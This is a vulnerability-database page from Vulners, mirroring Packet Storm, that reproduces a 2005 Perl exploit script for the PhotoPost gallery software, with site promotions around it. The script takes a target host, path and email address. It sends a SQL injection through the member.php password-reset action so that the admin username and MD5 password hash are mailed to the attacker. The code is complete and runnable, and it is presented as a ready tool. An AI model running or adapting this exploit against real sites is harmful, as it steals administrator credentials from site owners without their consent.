Lucene search

K

PhotoPostData.pl.txt

🗓️ 27 May 2005 00:00:00Reported by INFGPType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

PhotoPost Arbitrary Data Exploit by INFPG - Hacking&Security Research. Use exploit code to retrieve admin MD5 hash and username

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
# PhotoPost Arbitrary Data Exploit  
# --------------------------------  
# INFPG - Hacking&Security Research  
#  
#  
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.  
#  
# Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,  
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,  
# Jasakom,ECHO,etc..betst reagrds t0 whell.  
# Info: www.98.to/infamous  
#  
  
use IO::Socket;  
  
if (@ARGV < 3)  
{  
system "clear";  
print "PhotoPost Arbitrary Data Exploit\n";  
print "\n-------------------------------\n";  
print "\nINFGP-Hacking&Security Research\n";  
print "\n\n";  
print "[?]Usage: perl $0 [host] [path] [mail] \n";  
exit(1);  
}  
  
system "clear";  
  
$server = $ARGV[0];  
$folder = @ARGV[1];  
$mail = @ARGV[2];  
  
print "Connecting to host ...\n";  
$socket = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => "$ARGV[0]",  
PeerPort => "80"); unless ($socket)  
{  
die "Server is offline\n"  
}  
  
print "[+]Connected\n\n";  
print "[+]Building string core..\n";  
  
$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail  
,%20concat(username,"%20",%20password)%20from%20users';  
  
print "Sent 0day..\n\n";  
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";  
print "Server Exploited\n";  
print "You should check $mail now";  
close($socket);  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 May 2005 00:00Current
7.4High risk
Vulners AI Score7.4
16
.json
Report